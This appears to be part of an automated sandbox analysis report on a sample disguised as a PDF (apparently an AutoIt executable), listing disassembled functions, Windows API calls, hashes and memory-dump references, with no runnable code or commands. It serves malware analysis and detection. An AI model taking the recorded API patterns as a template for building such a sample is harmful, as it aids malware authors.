                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: c5a27dbd400c46533cdb48808e28d05890d724af826b67fa65ec5c9cc704677e
                                                                          • Instruction ID: 24b9abdea134650e6da9e94cb8ddc9c002c47c5b4ea6d45e23d2c34a6c8817f2
                                                                          • Opcode Fuzzy Hash: c5a27dbd400c46533cdb48808e28d05890d724af826b67fa65ec5c9cc704677e
                                                                          • Instruction Fuzzy Hash: 15410574508391CFDB24DF15C484B1ABBE0BF45318F1988ACE8998B762C736EC85CB52
                                                                          Function 00AE5B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 59a6117cc4e82b9340e85e26d54405980d529d2a02b8e949355077fe1b7f40f6
                                                                          • Instruction ID: 35890f21c21c5ef5f7a3f2d71a8094aa89b1c271666b1ff8d2caf40252b63ea9
                                                                          • Opcode Fuzzy Hash: 59a6117cc4e82b9340e85e26d54405980d529d2a02b8e949355077fe1b7f40f6
                                                                          • Instruction Fuzzy Hash: FA21D531A00A08EBDF145F65F986AAE7FF8FF14390F6184AAE895D6010EF70D4E09745
                                                                          Function 00AE4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00AE4D4D
                                                                            • Part of subcall function 00B0548B: __wfsopen.LIBCMT ref: 00B05496
                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4F6F
                                                                            • Part of subcall function 00AE4CC8: FreeLibrary.KERNEL32(00000000), ref: 00AE4D02
                                                                            • Part of subcall function 00AE4DD0: _memmove.LIBCMT ref: 00AE4E1A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                          • String ID:
                                                                          • API String ID: 1396898556-0
                                                                          • Opcode ID: a6fed814a712cf3de124e93b25ed8eb1a9d4482c65086199e2bab87f982c7d08
                                                                          • Instruction ID: f4a78da764efaeb8856edb2e3eb54d6d17660682f12f7e053aaa71d60e927536
                                                                          • Opcode Fuzzy Hash: a6fed814a712cf3de124e93b25ed8eb1a9d4482c65086199e2bab87f982c7d08
                                                                          • Instruction Fuzzy Hash: B311E731A00709AACB10AF71DD52BAE77E8DF48B00F208429F541A72C1DA759A05AB50
                                                                          Function 00B201AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ClearVariant
                                                                          • String ID:
                                                                          • API String ID: 1473721057-0
                                                                          • Opcode ID: 392d860d00d9b951882c7cf2433f538c5357120e902b3f7b65db7ccebbce5ed0
                                                                          • Instruction ID: c96e6688f938bf250f717e72eeca535da4df2a1d31461d47c30c3cbd0761ed81
                                                                          • Opcode Fuzzy Hash: 392d860d00d9b951882c7cf2433f538c5357120e902b3f7b65db7ccebbce5ed0
                                                                          • Instruction Fuzzy Hash: 8E2122B4508391DFDB28DF65C484B1BBBE0BF88304F0589A8E89A47762D731F845CB52
                                                                          Function 00AE5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00AE5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00AE5D76
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FileRead
                                                                          • String ID:
                                                                          • API String ID: 2738559852-0
                                                                          • Opcode ID: 36d1e56f376e79eedabd549641c2eb8997198b003f95cc85d040dbd04b1bda97
                                                                          • Instruction ID: 08126c069e540ca0a4b96ebf3dabb13caab54035f096adb800fb9864f9cf5204
                                                                          • Opcode Fuzzy Hash: 36d1e56f376e79eedabd549641c2eb8997198b003f95cc85d040dbd04b1bda97
                                                                          • Instruction Fuzzy Hash: 89113A31600B419FD330CF26E884B62B7F9EF45764F10C92EE4AA86A50D7B0E945CB60
                                                                          Function 00AE5BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                                                          • Instruction ID: 1e0c7cef51a818f96379971c6042ec8eaa317df41588f6beee5433efc2cc8796
                                                                          • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                                                                          • Instruction Fuzzy Hash: 3301A2B9A00582AFC305EB69D951D26FBE9FF8A3547148159F859C7702EB30EC21CBE0
                                                                          Function 00AE7F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID:
                                                                          • API String ID: 4104443479-0
                                                                          • Opcode ID: 8a8d4b6ba47c7672167fa2ff1e97bab8bb71795d9adcd2e888c102ddf95708d5
                                                                          • Instruction ID: 36839cb93d23f25ee95691cbdedd24b41237d4e31bffb31aff1e99e2af2e07e7
                                                                          • Opcode Fuzzy Hash: 8a8d4b6ba47c7672167fa2ff1e97bab8bb71795d9adcd2e888c102ddf95708d5
                                                                          • Instruction Fuzzy Hash: 4101D6722147016ED3245B29CC06F67BBE4EB447A0F10852EF55ACA1D1EA31E400D790
                                                                          Function 00B04A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __lock_file.LIBCMT ref: 00B04AD6
                                                                            • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __getptd_noexit__lock_file
                                                                          • String ID:
                                                                          • API String ID: 2597487223-0
                                                                          • Opcode ID: 82b1d9e7e24c3793ff77397505ec8982168e9efa72c6811d53ba04adf5d5440b
                                                                          • Instruction ID: 946cbbb8ddc9db0d1e48c7e92a275352a854e9ed8ea63a5fbd709a023dfc4ab2
                                                                          • Opcode Fuzzy Hash: 82b1d9e7e24c3793ff77397505ec8982168e9efa72c6811d53ba04adf5d5440b
                                                                          • Instruction Fuzzy Hash: E4F0AFB1A40209ABDF61BF74CC0679F3EE1AF00365F1486A4B524AA1E1CB788A60DF51
                                                                          Function 00AE4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4FDE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID:
                                                                          • API String ID: 3664257935-0
                                                                          • Opcode ID: 809218ad23ed75bf9d30338612bd28d901d65f83562150fab30da25aa507f792
                                                                          • Instruction ID: e2fc37621e51793400949837d80ed4ae390a149876ac808e49e9404bc85e4117
                                                                          • Opcode Fuzzy Hash: 809218ad23ed75bf9d30338612bd28d901d65f83562150fab30da25aa507f792
                                                                          • Instruction Fuzzy Hash: 5FF03071109B52CFC7349F65E494912BBF9BF18B253208A7EE1D682A10C7719840DF50
                                                                          Function 00B009D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B009F4
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LongNamePath_memmove
                                                                          • String ID:
                                                                          • API String ID: 2514874351-0
                                                                          • Opcode ID: f7bc74d09aa4e205da2fd2ad4b22d59d7591cbac0a226fe651284fb95cac289a
                                                                          • Instruction ID: 320490204bc047009e6547c9fe1f9538ae0ec258e3e4c94a412027262746949e
                                                                          • Opcode Fuzzy Hash: f7bc74d09aa4e205da2fd2ad4b22d59d7591cbac0a226fe651284fb95cac289a
                                                                          • Instruction Fuzzy Hash: B0E0867690422857C720D65C9C05FFA77EDDF88690F0401B5FD0CD7248D9A49C818A90
                                                                          Function 00B49129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock
                                                                          • String ID:
                                                                          • API String ID: 2638373210-0
                                                                          • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                          • Instruction ID: c8c33fdef82b5da319073cdaf454adc145f37396cc8b3c95d92ef051d350ebfc
                                                                          • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                          • Instruction Fuzzy Hash: 6FE092B0104B005FD7348A24D8107E377E0EB06315F00085DF69A93341EB6278419B59
                                                                          Function 00AE5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00B1E16B,?,?,00000000), ref: 00AE5DBF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: FilePointer
                                                                          • String ID:
                                                                          • API String ID: 973152223-0
                                                                          • Opcode ID: 454f2f9317dfc8c17f19390df74458fddb91ad548376ff1c547c326f7b889ff7
                                                                          • Instruction ID: cf7013f60bf05623e84819d8179b5942a3d67e8e114dec55d6660bbe705eb09e
                                                                          • Opcode Fuzzy Hash: 454f2f9317dfc8c17f19390df74458fddb91ad548376ff1c547c326f7b889ff7
                                                                          • Instruction Fuzzy Hash: E1D0C77464420CBFE710DB80DC46FA9777CD705710F100194FD0467290D6F27D508795
                                                                          Function 00B0548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __wfsopen
                                                                          • String ID:
                                                                          • API String ID: 197181222-0
                                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction ID: 4227a6a2070449e2852e7afb99fa5cc7c4cabc0b4e2ca818ff8b1a51092e6f48
                                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                          • Instruction Fuzzy Hash: 72B09B7544010C77DE111D42EC02A593F595740674F404050FB0C18561957395605585
                                                                          Function 00B4D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000002,00000000), ref: 00B4D46A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: df2d10ed8f21b8c2529bc8c4d3f9263083c53b1bf32b4c7d090f83a7ce3f2211
                                                                          • Instruction ID: 1eab777101bd45e6c868df2901f0f788a2ef893009d2aa99a83cc02aec55618f
                                                                          • Opcode Fuzzy Hash: df2d10ed8f21b8c2529bc8c4d3f9263083c53b1bf32b4c7d090f83a7ce3f2211
                                                                          • Instruction Fuzzy Hash: 72715E306043428FC714EF29D591A6EB7E0EF88354F0449ADF4968B3A2DB70EA45DB52
                                                                          Function 00B00E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction ID: 4cf513f2966df6617bfcd4d2536444bcbc925934f749392e46791c5037d7a228
                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                          • Instruction Fuzzy Hash: EB31A271A10106DBC718EF58D480A69FBE6FF59300F648AE5E409DB692DB31EDC1DB80
                                                                          Function 01C522A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 01C522B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction ID: 5f4244c0d4a6f9124560f3d734ecf8b79dab880f6c937e9ce2ebb9c72d0b2e26
                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction Fuzzy Hash: DEE0E67594010EEFDB00EFB4D94969E7FF4EF04311F100161FD05E2281D6309D508A72

                                                                          Non-executed Functions

                                                                          Function 00B6CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00B6CE50
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6CE91
                                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B6CED6
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6CF00
                                                                          • SendMessageW.USER32 ref: 00B6CF29
                                                                          • _wcsncpy.LIBCMT ref: 00B6CFA1
                                                                          • GetKeyState.USER32(00000011), ref: 00B6CFC2
                                                                          • GetKeyState.USER32(00000009), ref: 00B6CFCF
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B6CFE5
                                                                          • GetKeyState.USER32(00000010), ref: 00B6CFEF
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B6D018
                                                                          • SendMessageW.USER32 ref: 00B6D03F
                                                                          • SendMessageW.USER32(?,00001030,?,00B6B602), ref: 00B6D145
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B6D15B
                                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B6D16E
                                                                          • SetCapture.USER32(?), ref: 00B6D177
                                                                          • ClientToScreen.USER32(?,?), ref: 00B6D1DC
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B6D1E9
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B6D203
                                                                          • ReleaseCapture.USER32 ref: 00B6D20E
                                                                          • GetCursorPos.USER32(?), ref: 00B6D248
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6D255
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6D2B1
                                                                          • SendMessageW.USER32 ref: 00B6D2DF
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6D31C
                                                                          • SendMessageW.USER32 ref: 00B6D34B
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B6D36C
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B6D37B
                                                                          • GetCursorPos.USER32(?), ref: 00B6D39B
                                                                          • ScreenToClient.USER32(?,?), ref: 00B6D3A8
                                                                          • GetParent.USER32(?), ref: 00B6D3C8
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B6D431
                                                                          • SendMessageW.USER32 ref: 00B6D462
                                                                          • ClientToScreen.USER32(?,?), ref: 00B6D4C0
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B6D4F0
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B6D51A
                                                                          • SendMessageW.USER32 ref: 00B6D53D
                                                                          • ClientToScreen.USER32(?,?), ref: 00B6D58F
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B6D5C3
                                                                            • Part of subcall function 00AE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AE25EC
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6D65F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
